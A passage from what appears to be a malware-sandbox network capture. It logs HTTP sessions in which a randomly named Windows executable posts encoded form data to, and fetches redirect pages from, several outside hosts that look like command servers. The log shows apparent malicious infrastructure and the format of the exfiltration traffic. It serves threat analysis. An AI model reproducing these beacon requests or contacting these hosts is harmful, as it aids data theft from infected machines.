                                                      Data Ascii: rfJh=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNC9I0JhcdLViOiXvyzVvj1fE9gnEDpLZeEaylZWJe5O3vllcZPYofDWaP6mkb08yhFE8OpHFDtFov99Fgd6yjH8cMG1+lKyhDvwJRJzWgmgPx2C3LcoYU3GNXdtoPh2QE+m13/5aCeHeD5qaEOvTc3Eyjkr1fr2F8fGy8eI/ZjAfUw+xvg3YBuNbwYJ09uDOQZuYQ6Ykct3aCVU4NTdYYMe8jXEYJH9sN66GsMZe9+EQbiwLgEI1QImWecspREqrlQ6RhqWuJcwIOlOW2nmvSTDKNn0QKZJAA6eF0cdqD+6ogep3P6kpZ0c08EcXPRxm2/IEiXJ7FyI+MpgggFrR2IniryKRfqFytGVo3txefftxuJOtHYltO//7zfwrokM3Y+18Hdy3yJ1XqhY8MtjsNU0xKSwVTT1Oo+s5RUeN0ks2FAJryUxaABDicSnT77Tdxas9N7LzOolcXFPq0oMXM/uiowWKsACFYascK2+0hY3T5bbGs9memn78FUKq5MY0nh4racD5VfrGnehx4N9BPD7p4ys+4EqHGj/DLLX1yRhzGu2erq8pTAwPWX2s0xKe0Wgto/O8gfsrMA68P3z6+xc+sKOBwsTLR/aRGCk2Wmng5E0qNrWc32xCNGjqP0zDXclMYbQBKXaaaXuN7LSLBc0uE6SLhN2xZUgWYWOKQcV7nVC9ilHuIO3TEKx173OSZl3uszBhSbrO2Kol7cni18/6TfIFT/3Xf3jbUmO+qmKoRmtMlbeWvmpG+VfhzUe4OFdcaOR8c4P8yVbZBVF72QsStA8XCP2pDzU4zkbEgm4IPYQHwKcDg2VvdVDqi6gcusunQkJFPAAWEV0qMKAtaXO8dhceS9Qg0ooR/jjpgwjdhFDHZdf8LbhxEBvg/JYkg5YBxFERh08TVSO/Cbwn18AQcqsEPWKyMtNawyKNY5lERb4xxN6JjMq+okp+g2s+685TUy [TRUNCATED]
                                                      Dec 3, 2024 06:54:47.838072062 CET871INHTTP/1.1 200 OK
                                                      date: Tue, 03 Dec 2024 05:54:47 GMT
                                                      server: Apache
                                                      set-cookie: __tad=1733205287.1341641; expires=Fri, 01-Dec-2034 05:54:47 GMT; Max-Age=315360000
                                                      vary: Accept-Encoding
                                                      content-encoding: gzip
                                                      content-length: 576
                                                      content-type: text/html; charset=UTF-8
                                                      connection: close
                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                      Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.449776103.224.182.24280792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:54:49.146585941 CET361OUTGET /0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN4/hgDK7ji4WzdcK25sZRimZDxLZaBEcPhbk=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.madhf.tech
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:54:50.368663073 CET1236INHTTP/1.1 200 OK
                                                      date: Tue, 03 Dec 2024 05:54:50 GMT
                                                      server: Apache
                                                      set-cookie: __tad=1733205290.7632468; expires=Fri, 01-Dec-2034 05:54:50 GMT; Max-Age=315360000
                                                      vary: Accept-Encoding
                                                      content-length: 1484
                                                      content-type: text/html; charset=UTF-8
                                                      connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 30 6d 77 65 2f 3f 72 66 4a 68 3d 49 36 2f 4d 76 6f 73 49 31 4d 34 47 58 6e 41 42 34 62 54 57 42 47 44 70 38 35 68 73 4f 53 4e 65 39 74 6d 6b 45 73 7a 7a 52 74 4f 57 49 77 52 63 49 76 58 73 30 35 48 61 33 6a 58 59 6f 51 70 78 64 59 35 68 42 30 46 57 51 4d 31 56 7a 56 46 73 4a 62 56 4e 34 2f 68 67 44 4b 37 6a 69 34 57 7a 64 63 4b 32 35 73 5a 52 69 6d 5a 44 78 4c 5a 61 42 45 63 50 68 62 6b 3d 26 4f 32 35 38 2d 3d 70 48 64 48 42 64 58 68 77 4c [TRUNCATED]
                                                      Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN4/hgDK7ji4WzdcK25sZRimZDxLZaBEcPhbk=&O258-=pHdHBdXhwLO&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" t
                                                      Dec 3, 2024 06:54:50.368751049 CET520INData Raw: 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 30 6d 77 65 2f 3f 72 66
                                                      Data Ascii: ext="#000000"><div style='display: none;'><a href='http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN4/hgDK7ji4WzdcK25sZRimZDxLZaBEcPhbk=&O258-=pHdHBdXhwLO&fp=-3'>Click here t


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.449793185.27.134.20680792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:54:56.005814075 CET650OUTPOST /g3h7/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.canadavinreport.site
                                                      Origin: http://www.canadavinreport.site
                                                      Referer: http://www.canadavinreport.site/g3h7/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 51 77 43 32 39 6c 67 76 46 79 30 64 58 5a 4a 63 73 69 6f 65 6b 4e 69 68 5a 54 5a 61 36 39 71 76 77 7a 54 66 53 76 59 42 69 65 55 70 47 65 64 46 2b 41 76 71 44 78 47 41 66 4f 64 45 48 54 5a 38 71 79 77 51 62 4c 4d 6e 4f 67 6d 7a 4f 56 72 41 6a 78 49 75 4f 73 4d 77 4f 76 75 63 4a 64 6a 6f 42 78 72 4b 54 66 56 75 55 44 31 57 79 32 38 33 4a 53 66 75 5a 59 41 41 47 41 30 32 4a 59 73 47 7a 36 67 56 4e 5a 65 46 65 59 45 43 46 30 34 44 4a 4b 5a 6e 42 2b 72 64 47 55 6f 42 6e 4a 4c 53 69 44 62 51 57 67 47 6c 73 6f 47 45 73 6f 43 55 66 33 67 4d 45 59 66 4f 72 4d 69 57 45 48 62 76 4e 67 3d 3d
                                                      Data Ascii: rfJh=QwC29lgvFy0dXZJcsioekNihZTZa69qvwzTfSvYBieUpGedF+AvqDxGAfOdEHTZ8qywQbLMnOgmzOVrAjxIuOsMwOvucJdjoBxrKTfVuUD1Wy283JSfuZYAAGA02JYsGz6gVNZeFeYECF04DJKZnB+rdGUoBnJLSiDbQWgGlsoGEsoCUf3gMEYfOrMiWEHbvNg==
                                                      Dec 3, 2024 06:54:57.242728949 CET683INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:54:57 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Cache-Control: no-cache
                                                      Content-Encoding: br
                                                      Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 72 fa fa 72 cc c2 85 08 62 4d c9 cc 5f eb 6f 8a b6 3e f3 81 73 a2 4e 74 aa 91 0d be 59 72 e2 80 27 5c 1e 75 a3 9f f0 aa 73 78 fa cf 4d a0 6b 17 12 83 20 a7 24 30 fd 49 0f b5 7a 03 fc a4 e2 78 86 c9 c6 a5 d7 7a f6 0a 41 3f 6c 6e 2c 94 ef fb 52 de 1e 31 72 5e 8b 08 70 2a d9 eb db 2e e6 21 d3 14 75 8d 9a 31 0e 82 5c 99 94 0e 1c 96 74 c4 44 22 f4 0f 71 3f fd 77 91 38 49 5f 05 fa 85 6b 25 da eb 5b 1c 2d b1 76 d6 68 59 d7 37 37 ad 10 fb 4b 7f 4f ff e1 f1 c5 da dd 97 17 f7 bd ed c3 0f 0c f3 38 59 08 71 b6 6d 97 87 f1 7d db bb 5c 96 28 95 b6 20 b2 8f d7 f9 76 1b b6 70 00 21 2a 2f ae 16 d0 a0 20 72 d8 e5 6c 48 e8 7f bc 3d 67 01 fa 0f 98 a5 10 de 99 d8 1a 47 08 8d dc 48 1d 24 13 ca 44 2f 4c eb 39 44 d8 c7 bc 36 9a 71 1e 68 4a 49 cb c0 8c e1 da b4 c2 50 a1 85 e7 26 eb b6 81 c2 e3 56 30 c2 89 24 cc 05 1d 9d 12 3c 11 a3 94 73 d1 79 19 02 cd 2d ee e2 63 98 36 ba 02 98 b2 f0 fe fe 2d bd be 59 58 22 0d 09 ec fc ee e1 55 1d 53 78 f9 7e 7a 2b 02 a6 d8 61 8f 50 09 3b c0 cc 0f ed 68 f2 [TRUNCATED]
                                                      Data Ascii: 1b98 rrbM_o>sNtYr'\usxMk $0IzxzA?ln,R1r^p*.!u1\tD"q?w8I_k%[-vhY77KO8Yqm}\( vp!*/ rlH=gGH$D/L9D6qhJIP&V0$<sy-c6-YX"USx~z+aP;h#AS!Gjr"v>+S5Cml%k%3@O%/e*>JF60


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.449801185.27.134.20680792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:54:58.670360088 CET670OUTPOST /g3h7/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.canadavinreport.site
                                                      Origin: http://www.canadavinreport.site
                                                      Referer: http://www.canadavinreport.site/g3h7/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 41 70 48 39 4a 46 73 52 76 71 45 78 47 41 48 2b 64 64 44 54 59 2b 71 79 38 75 62 4c 67 6e 4f 67 79 7a 4f 56 62 41 6a 47 38 76 55 63 4d 79 47 50 75 65 48 39 6a 6f 42 78 72 4b 54 66 52 45 55 44 74 57 79 48 4d 33 4a 7a 66 74 48 49 41 44 42 41 30 32 43 34 73 61 7a 36 67 33 4e 62 71 76 65 61 38 43 46 30 6f 44 4a 66 74 6f 55 4f 72 62 43 55 70 33 76 38 75 37 6a 57 75 42 4a 77 54 44 72 64 69 44 67 4f 50 4f 4f 47 42 62 57 59 37 39 32 4c 72 69 4a 45 6d 6d 57 71 55 36 62 43 7a 39 6c 41 71 32 47 2f 73 67 2f 6f 54 71 42 4a 73 3d
                                                      Data Ascii: rfJh=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0RisApH9JFsRvqExGAH+ddDTY+qy8ubLgnOgyzOVbAjG8vUcMyGPueH9joBxrKTfREUDtWyHM3JzftHIADBA02C4saz6g3Nbqvea8CF0oDJftoUOrbCUp3v8u7jWuBJwTDrdiDgOPOOGBbWY792LriJEmmWqU6bCz9lAq2G/sg/oTqBJs=
                                                      Dec 3, 2024 06:54:59.951869011 CET683INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:54:59 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Cache-Control: no-cache
                                                      Content-Encoding: br
                                                      Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 72 fa fa 72 cc c2 85 08 62 4d c9 cc 5f eb 6f 8a b6 3e f3 81 73 a2 4e 74 aa 91 0d be 59 72 e2 80 27 5c 1e 75 a3 9f f0 aa 73 78 fa cf 4d a0 6b 17 12 83 20 a7 24 30 fd 49 0f b5 7a 03 fc a4 e2 78 86 c9 c6 a5 d7 7a f6 0a 41 3f 6c 6e 2c 94 ef fb 52 de 1e 31 72 5e 8b 08 70 2a d9 eb db 2e e6 21 d3 14 75 8d 9a 31 0e 82 5c 99 94 0e 1c 96 74 c4 44 22 f4 0f 71 3f fd 77 91 38 49 5f 05 fa 85 6b 25 da eb 5b 1c 2d b1 76 d6 68 59 d7 37 37 ad 10 fb 4b 7f 4f ff e1 f1 c5 da dd 97 17 f7 bd ed c3 0f 0c f3 38 59 08 71 b6 6d 97 87 f1 7d db bb 5c 96 28 95 b6 20 b2 8f d7 f9 76 1b b6 70 00 21 2a 2f ae 16 d0 a0 20 72 d8 e5 6c 48 e8 7f bc 3d 67 01 fa 0f 98 a5 10 de 99 d8 1a 47 08 8d dc 48 1d 24 13 ca 44 2f 4c eb 39 44 d8 c7 bc 36 9a 71 1e 68 4a 49 cb c0 8c e1 da b4 c2 50 a1 85 e7 26 eb b6 81 c2 e3 56 30 c2 89 24 cc 05 1d 9d 12 3c 11 a3 94 73 d1 79 19 02 cd 2d ee e2 63 98 36 ba 02 98 b2 f0 fe fe 2d bd be 59 58 22 0d 09 ec fc ee e1 55 1d 53 78 f9 7e 7a 2b 02 a6 d8 61 8f 50 09 3b c0 cc 0f ed 68 f2 [TRUNCATED]
                                                      Data Ascii: 1b98 rrbM_o>sNtYr'\usxMk $0IzxzA?ln,R1r^p*.!u1\tD"q?w8I_k%[-vhY77KO8Yqm}\( vp!*/ rlH=gGH$D/L9D6qhJIP&V0$<sy-c6-YX"USx~z+aP;h#AS!Gjr"v>+S5Cml%k%3@O%/e*>JF60


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.449809185.27.134.20680792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:01.337131023 CET10752OUTPOST /g3h7/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.canadavinreport.site
                                                      Origin: http://www.canadavinreport.site
                                                      Referer: http://www.canadavinreport.site/g3h7/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 34 70 47 50 52 46 2b 69 33 71 46 78 47 41 5a 4f 64 41 44 54 59 2f 71 79 30 71 62 4c 63 64 4f 6b 43 7a 50 30 37 41 6c 30 55 76 61 73 4d 79 4b 76 75 44 4a 64 6a 48 42 77 48 47 54 66 42 45 55 44 74 57 79 45 6b 33 4c 69 66 74 46 49 41 41 47 41 30 36 4a 59 73 6d 7a 36 34 4e 4e 59 47 56 65 75 41 43 45 51 30 44 4c 74 31 6f 57 75 72 5a 50 30 70 2f 76 38 71 67 6a 51 4b 4e 4a 77 6d 6d 72 62 65 44 71 4c 32 33 63 32 45 41 45 6f 72 5a 70 59 62 2b 42 6c 36 6c 56 61 46 43 55 42 76 4b 2b 42 43 68 4d 64 64 51 67 4b 66 72 58 4a 53 41 6a 69 35 41 7a 72 79 54 55 66 53 76 57 51 2b 49 62 76 50 67 4e 66 79 74 71 35 35 52 4b 37 73 70 48 66 30 2f 63 54 48 56 59 64 32 6b 6c 75 61 53 50 6f 6a 39 78 50 34 79 58 61 5a 53 4c 6a 37 6c 6f 69 7a 48 4f 47 56 56 35 38 54 53 66 6f 51 51 4a 41 43 61 6c 41 55 78 38 67 58 64 66 66 45 42 58 44 4f 4b 47 43 44 41 66 70 4f 56 57 63 46 30 63 74 2b 57 4d [TRUNCATED]
                                                      Data Ascii: rfJh=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0Ris4pGPRF+i3qFxGAZOdADTY/qy0qbLcdOkCzP07Al0UvasMyKvuDJdjHBwHGTfBEUDtWyEk3LiftFIAAGA06JYsmz64NNYGVeuACEQ0DLt1oWurZP0p/v8qgjQKNJwmmrbeDqL23c2EAEorZpYb+Bl6lVaFCUBvK+BChMddQgKfrXJSAji5AzryTUfSvWQ+IbvPgNfytq55RK7spHf0/cTHVYd2kluaSPoj9xP4yXaZSLj7loizHOGVV58TSfoQQJACalAUx8gXdffEBXDOKGCDAfpOVWcF0ct+WMQh9UOOPOuSaT8uFcY0baoT7rNui1QyCmqBdW2aQhftVLBPz0Fz9ts/9KTLHDj5d5YKSDm7TA21YKnR4FRTilyEhqDnnnmkkHF9QiV4AqM2fHHEQpJ0ggVJGswCzSxjpYvPCPvlOFkCC9wy9JWyiVSwF7LHXnrpoMmRJ11z1peGLQjIdhUap0M0WvcO392d+iRvu+w/bz75mhTzcmGAyf7bFNGhMNyExYRlW8vILx3m7LiOmajyTER/p6rJgVdDcUdldhjy7JSnwmmUSjcMqTClghQzL7CIMU83j3XnhgK3VxjuJCNo4vHwzB2HSDwc3SH8l3I1F5ufRi60ETLSbeoEFNZfkCc9UiUH4HUxeutX9Ui6c2+FRAHZPoyhKN8uiU4SFWW2rBXK3RTloYRnGYaesn346UPJY1+qtGleFpxZfqNh1klUCnsxQFL/UcyQLTZIAUkNM6X4C0oP4VER0xXjTCdvzA76iGC3qDcDT8TRRg/leM7pmqq4cTAyzkRV+dbXuM9yYZorq+0ISGDHYG+ozA07trywruR8PjynavjtJyapZ+BtUzqL22nmqVicr3BNVls6uHtlpdkxA/NbE5kuvwptbCvFYe0D701jkSHEoKrT0ceUSUrFDk19vvx4P+1f/41unGaz0PpPRte0KcGDzKlZf2LlYXrg [TRUNCATED]
                                                      Dec 3, 2024 06:55:02.622072935 CET683INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:02 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Cache-Control: no-cache
                                                      Content-Encoding: br
                                                      Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 72 fa fa 72 cc c2 85 08 62 4d c9 cc 5f eb 6f 8a b6 3e f3 81 73 a2 4e 74 aa 91 0d be 59 72 e2 80 27 5c 1e 75 a3 9f f0 aa 73 78 fa cf 4d a0 6b 17 12 83 20 a7 24 30 fd 49 0f b5 7a 03 fc a4 e2 78 86 c9 c6 a5 d7 7a f6 0a 41 3f 6c 6e 2c 94 ef fb 52 de 1e 31 72 5e 8b 08 70 2a d9 eb db 2e e6 21 d3 14 75 8d 9a 31 0e 82 5c 99 94 0e 1c 96 74 c4 44 22 f4 0f 71 3f fd 77 91 38 49 5f 05 fa 85 6b 25 da eb 5b 1c 2d b1 76 d6 68 59 d7 37 37 ad 10 fb 4b 7f 4f ff e1 f1 c5 da dd 97 17 f7 bd ed c3 0f 0c f3 38 59 08 71 b6 6d 97 87 f1 7d db bb 5c 96 28 95 b6 20 b2 8f d7 f9 76 1b b6 70 00 21 2a 2f ae 16 d0 a0 20 72 d8 e5 6c 48 e8 7f bc 3d 67 01 fa 0f 98 a5 10 de 99 d8 1a 47 08 8d dc 48 1d 24 13 ca 44 2f 4c eb 39 44 d8 c7 bc 36 9a 71 1e 68 4a 49 cb c0 8c e1 da b4 c2 50 a1 85 e7 26 eb b6 81 c2 e3 56 30 c2 89 24 cc 05 1d 9d 12 3c 11 a3 94 73 d1 79 19 02 cd 2d ee e2 63 98 36 ba 02 98 b2 f0 fe fe 2d bd be 59 58 22 0d 09 ec fc ee e1 55 1d 53 78 f9 7e 7a 2b 02 a6 d8 61 8f 50 09 3b c0 cc 0f ed 68 f2 [TRUNCATED]
                                                      Data Ascii: 1b98 rrbM_o>sNtYr'\usxMk $0IzxzA?ln,R1r^p*.!u1\tD"q?w8I_k%[-vhY77KO8Yqm}\( vp!*/ rlH=gGH$D/L9D6qhJIP&V0$<sy-c6-YX"USx~z+aP;h#AS!Gjr"v>+S5Cml%k%3@O%/e*>JF60


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.449814185.27.134.20680792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:03.990909100 CET371OUTGET /g3h7/?rfJh=dyqW+SkpLS8uL5dSny8q8PjeDBZe49z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRpkPLcScFLLxAHuiMJY3F0pG7ioCFxuNP/M=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.canadavinreport.site
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:55:05.230115891 CET1185INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 984
                                                      Connection: close
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Cache-Control: no-cache
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                      Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("053141613ac8da754e1977aadab6cc2f");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/g3h7/?rfJh=dyqW+SkpLS8uL5dSny8q8PjeDBZe49z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRpkPLcScFLLxAHuiMJY3F0pG7ioCFxuNP/M=&O258-=pHdHBdXhwLO&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.449833106.15.109.3380792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:55:11.740147114 CET629OUTPOST /t322/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.yunlekeji.top
                                                      Origin: http://www.yunlekeji.top
